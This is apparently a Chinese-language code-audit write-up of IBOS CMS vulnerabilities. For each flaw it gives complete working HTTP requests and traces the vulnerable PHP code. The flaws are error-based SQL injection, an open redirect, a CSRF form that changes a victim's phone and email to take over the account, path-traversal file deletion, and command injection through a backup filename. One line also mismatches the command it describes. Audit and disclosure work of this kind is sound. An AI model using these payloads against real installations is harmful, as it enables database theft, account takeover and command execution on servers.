一、sql注入

1、sql注入(Ⅰ)

限制

r=report/api/getlist
{"offset":0,"type":"send","keyword":{"subject":"111') AND (updatexml(1,concat(0x7e,(select user()),0x7e),1))-- qw"}}

復現

POST /?r=report/api/getlist HTTP/1.1
Host: www.iboscms.com
Content-Length: 124
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: application/json;utf-8
Origin: http://www.iboscms.com
Referer: http://www.iboscms.com/?r=report/default/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 4c3g_saltkey=63nNHRVr; lastautologin=0; PHPSESSID=8fc8uo57ohjf3stjapiaq5j4n7; 4c3g_ulastactivity=5fe9ne6epqckB7fpglBVLuvu3nk2fL2z5pEkNLKlV%2BDBUL6J780o; 4c3g_creditremind=0D0D2D0D0D0D1; 4c3g_creditbase=0D0D0D0D0D0; 4c3g_creditrule=%E6%AF%8F%E5%A4%A9%E7%99%BB%E5%BD%95; 4c3g_lastactivity=1686657315; 4c3g_sid=OpcVsd
Connection: close{"limit":10,"offset":0,"type":"send","keyword":{"subject":"') AND (updatexml(1,concat(0x7e,(select user()),0x7e),1))-- qw"}}

代碼

根據路由找到相關代碼文件，參數getlist指定一個地址

進入參數指定的地址文件。向知道有沒有進到此代碼，可以輸出加結束代碼

首先進去的getListCondition函數，是用來拼接了sql語句。可控的參數是$keyword數組里的subject，拼接后賦值給$condition，最后return $condition;

在進入getReportByCondition方法，執行了拼接的語句，而報錯語句是在$list里出現的。所有的過程中沒有對特殊字符進行過濾

2、sql注入(Ⅱ)

限制

r=file/company/ajaxent&op=download&fids=
閉合:  ')

復現

2')+and+updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,%40%40datadir),1)%20--%20w

GET /?r=file/company/ajaxent&op=download&fids=2')+and+updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,%40%40datadir),1)%20--%20w HTTP/1.1
Host: www.iboscms.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.iboscms.com/?r=file/company/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 4c3g_saltkey=63nNHRVr; lastautologin=0; 4c3g_creditbase=0D0D22D4D0D0; 4c3g_creditremind=0D0D1D1D0D0D1; 4c3g_creditrule=%E5%AE%8C%E6%88%90%E4%BB%BB%E5%8A%A1%E6%8C%87%E6%B4%BE; 4c3g_lately.SelectBox=u_3%252Cp_3%252Cp_2%252Cc_0%252Cp_2%252Cr_1%252Cu_3%252Cc_0%252Cp_1%252Cr_1%252Cu_3%252Cc_0%252Cp_2%252Cr_1%252Cu_1%252Cu_2%252Cu_3%252Cu_4%252Cu_1%252Cu_2%252Cc_0%252Cu_2%252Cc_0%252Cp_2%252Cu_3%252Cu_1%252Cu_2%252Cp_3%252Cp_2%252Cu_3%252Cu_1%252Cc_0%252Cp_24%252Cu_2%252Cu_1; 4c3g_ulastactivity=16826P2hblgxZ2YZv%2FzkL0qm4ZyvY0x7ge29SnM1%2BRZpBp0SSRm5; PHPSESSID=ur67vfu26i7f2fj01v2aol3r37; 4c3g_lastactivity=1687867850; 4c3g_sid=37WQgG
Connection: close

代碼

定位到函數，接受op，判斷op是否在規定的數組，在數組就this->$op

調用了download的方法

經過一系列查找，找到了sql語句拼接執行的地方

三、url重定向

限制

username=admin&password=admin&loginsubmit=&cookietime=&refer=%2Ffavicon.ico

復現

POST /?r=user/default/login HTTP/1.1
Host: www.iboscms.com
Content-Length: 142
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.iboscms.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.iboscms.com/?r=user/default/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 4c3g_saltkey=63nNHRVr; lastautologin=0; PHPSESSID=8fc8uo57ohjf3stjapiaq5j4n7; 4c3g_ulastactivity=5fe9ne6epqckB7fpglBVLuvu3nk2fL2z5pEkNLKlV%2BDBUL6J780o; 4c3g_creditremind=0D0D2D0D0D0D1; 4c3g_creditbase=0D0D0D0D0D0; 4c3g_creditrule=%E6%AF%8F%E5%A4%A9%E7%99%BB%E5%BD%95; 4c3g_lastactivity=1686657315; 4c3g_sid=p26426
Connection: closeusername=admin&password=admin&loginsubmit=%E7%99%BB+%E5%BD%95&cookietime=86400&formhash=&refer=http://www.baidu.com&find_email=&find_username=

代碼

第一個if判斷如果用戶不是游客，就跳到main/default/index目錄；
第二個判斷如果loginsubmit參數不為1，如果用戶沒有提交表單，則會重定向到應用程序的登錄頁面(這里判斷如果不是get請求就進入else)

getRequest用來接受參數，將接受的參數調用dologin函數

第一個個if,如果密碼為空或者密碼不匹配提示錯誤;loginCheck、getIdentitiesByNameOfPass、loginAuthenticate三個方法再去驗證賬號密碼是否匹配；
第二個if，如果用戶存在并且不是inajax,就調用handleWebLogin方法

getUrlForward獲取登錄后網址

$refer變量如果不為空，指向哪里跳到哪里

四、csrf

限制

對方處于登錄狀態

復現

POST /?r=user/home/personal HTTP/1.1
Host: www.iboscms.com
Content-Length: 118
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.iboscms.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.iboscms.com/?r=user/home/personal&op=profile
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 4c3g_saltkey=63nNHRVr; lastautologin=0; 4c3g_ulastactivity=9a75IhoWmYHvx0re%2BUj3ZTW5g2whEZGOqefKDzKjP3lGTLoxpI%2BR; 4c3g_creditbase=0D0D22D4D0D0; 4c3g_creditremind=0D0D1D1D0D0D1; 4c3g_creditrule=%E5%AE%8C%E6%88%90%E4%BB%BB%E5%8A%A1%E6%8C%87%E6%B4%BE; 4c3g_lately.SelectBox=u_3%252Cp_3%252Cp_2%252Cc_0%252Cp_2%252Cr_1%252Cu_3%252Cc_0%252Cp_1%252Cr_1%252Cu_3%252Cc_0%252Cp_2%252Cr_1%252Cu_1%252Cu_2%252Cu_3%252Cu_4%252Cu_1%252Cu_2%252Cc_0%252Cu_2%252Cc_0%252Cp_2%252Cu_3%252Cu_1%252Cu_2%252Cp_3%252Cp_2%252Cu_3%252Cu_1%252Cc_0%252Cp_24%252Cu_2; PHPSESSID=bde57e1jbl4eq2bqduuejptr55; 4c3g_lastactivity=1687784554; 4c3g_sid=piICL6
Connection: closebirthday=&bio=&mobile=15611223399&email=33%40qq.com&qq=&weixin=&telephone=&address=&formhash=8d30a07a&op=profile&uid=1

偽造代碼

<html><!-- CSRF PoC - generated by Burp Suite Professional --><body><script>history.pushState('', '', '/')</script><form action="http://www.iboscms.com/?r=user/home/personal" method="POST"><input type="hidden" name="birthday" value="" /><input type="hidden" name="bio" value="" /><input type="hidden" name="mobile" value="13311222222" /><input type="hidden" name="email" value="33&#64;qq&#46;com" /><input type="hidden" name="qq" value="" /><input type="hidden" name="weixin" value="" /><input type="hidden" name="telephone" value="" /><input type="hidden" name="address" value="" /><input type="hidden" name="formhash" value="8d30a07a" /><input type="hidden" name="op" value="profile" /><input type="hidden" name="uid" value="1" /><input type="submit" value="Submit request" /></form></body>
</html>

修改手機號和郵箱，可以通過手機號找回密碼

代碼

根據路由進入代碼文件，接受op,判斷op是否在數組里，如果不在將$op設置為默認值'profile'

submitCheck方法驗證是否有提交表單操作，else表示有提交并進行賦值

五、任意文件刪除

限制

key%5B2023-06-13_6VvdkJok%5D=...\1.txt&dbSubmit=1
/被替換了使用\

復現

POST /?r=dashboard/database/restore HTTP/1.1
Host: www.iboscms.com
Content-Length: 48
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.iboscms.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.iboscms.com/?r=dashboard/database/restore
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 4c3g_saltkey=63nNHRVr; lastautologin=0; 4c3g_lately.SelectBox=u_3%252Cp_3%252Cp_2%252Cc_0%252Cp_2%252Cr_1%252Cu_3%252Cc_0%252Cp_1%252Cr_1%252Cu_3%252Cc_0%252Cp_2%252Cr_1%252Cu_1%252Cu_2%252Cu_3%252Cu_4%252Cu_1%252Cu_2%252Cc_0%252Cu_2%252Cc_0%252Cp_2%252Cu_3%252Cu_1%252Cu_2%252Cp_3%252Cp_2%252Cu_3%252Cu_1%252Cc_0%252Cp_24%252Cu_2%252Cu_1; 4c3g_ulastactivity=bec4dBFZWyHzyRwk6rlqz%2F3M5X5aYM4f2c6e5yRhnHMLXT9QhCjB; PHPSESSID=tbo3bk1ptfgs2hr3r163tte7f4; 4c3g_lastactivity=1688044573; 4c3g_sid=8v888V
Connection: closekey%5B2023-06-13_6VvdkJok%5D=..\1.txt&dbSubmit=1

在date文件夾下新建1.txt

代碼

dbSubmit參數存在，post接受的key是數組并且進行/替換為空，如果是文件就直接刪除

六、命令注入

限制

數據備份方式選擇系統 MySQL Dump (Shell) 備份

復現

&whoami>demo5&將ipconfig執行的結果保存到demo5文檔中

POST /?r=dashboard/database/backup HTTP/1.1
Host: www.iboscms.com
Content-Length: 184
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.iboscms.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.iboscms.com/?r=dashboard/database/backup
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 4c3g_saltkey=63nNHRVr; JEXp_saltkey=i95GW99U; JEXp_autologin=1; JEXp_ulastactivity=8206K0qI5%2FP8k%2FB1gRtuU56xFbGnyktaCrP6hW5rQWZwtpdkk5nD; PHPSESSID=nej6cftvup2cs8qd4jqcdmkul3; JEXp_lastactivity=1688126770; JEXp_sid=Z1sty8
Connection: closebackuptype=all&custom_enabled=1&method=shell&sizelimit=2048&extendins=0&sqlcompat=MYSQL41&sqlcharset=utf8&usehex=0&usezip=0&filename=2023-06-30_yD6OXW6L+%26whoami%3Edemo2%26&dbSubmit=1

代碼

Database 類來執行數據庫備份 databaseBackup() 方法

接受的參數filename文件名，進行了一波文件名后綴過濾，到這里知道$filename是可控的。所以只需要看$filename變量有沒有做其他限制

這里又對$filename做了過濾，將 / 、 \\ 、 . 、 ' 替換為空并賦值給 $backupFileName，其次進入if ($method == 'multivol')，if里的也沒有其他危險操作

$backupFileName在else里做了拼接賦值給了$dumpFile，此變量在453行做了拼接，而在php中反引號 ` 可以執行系統命令。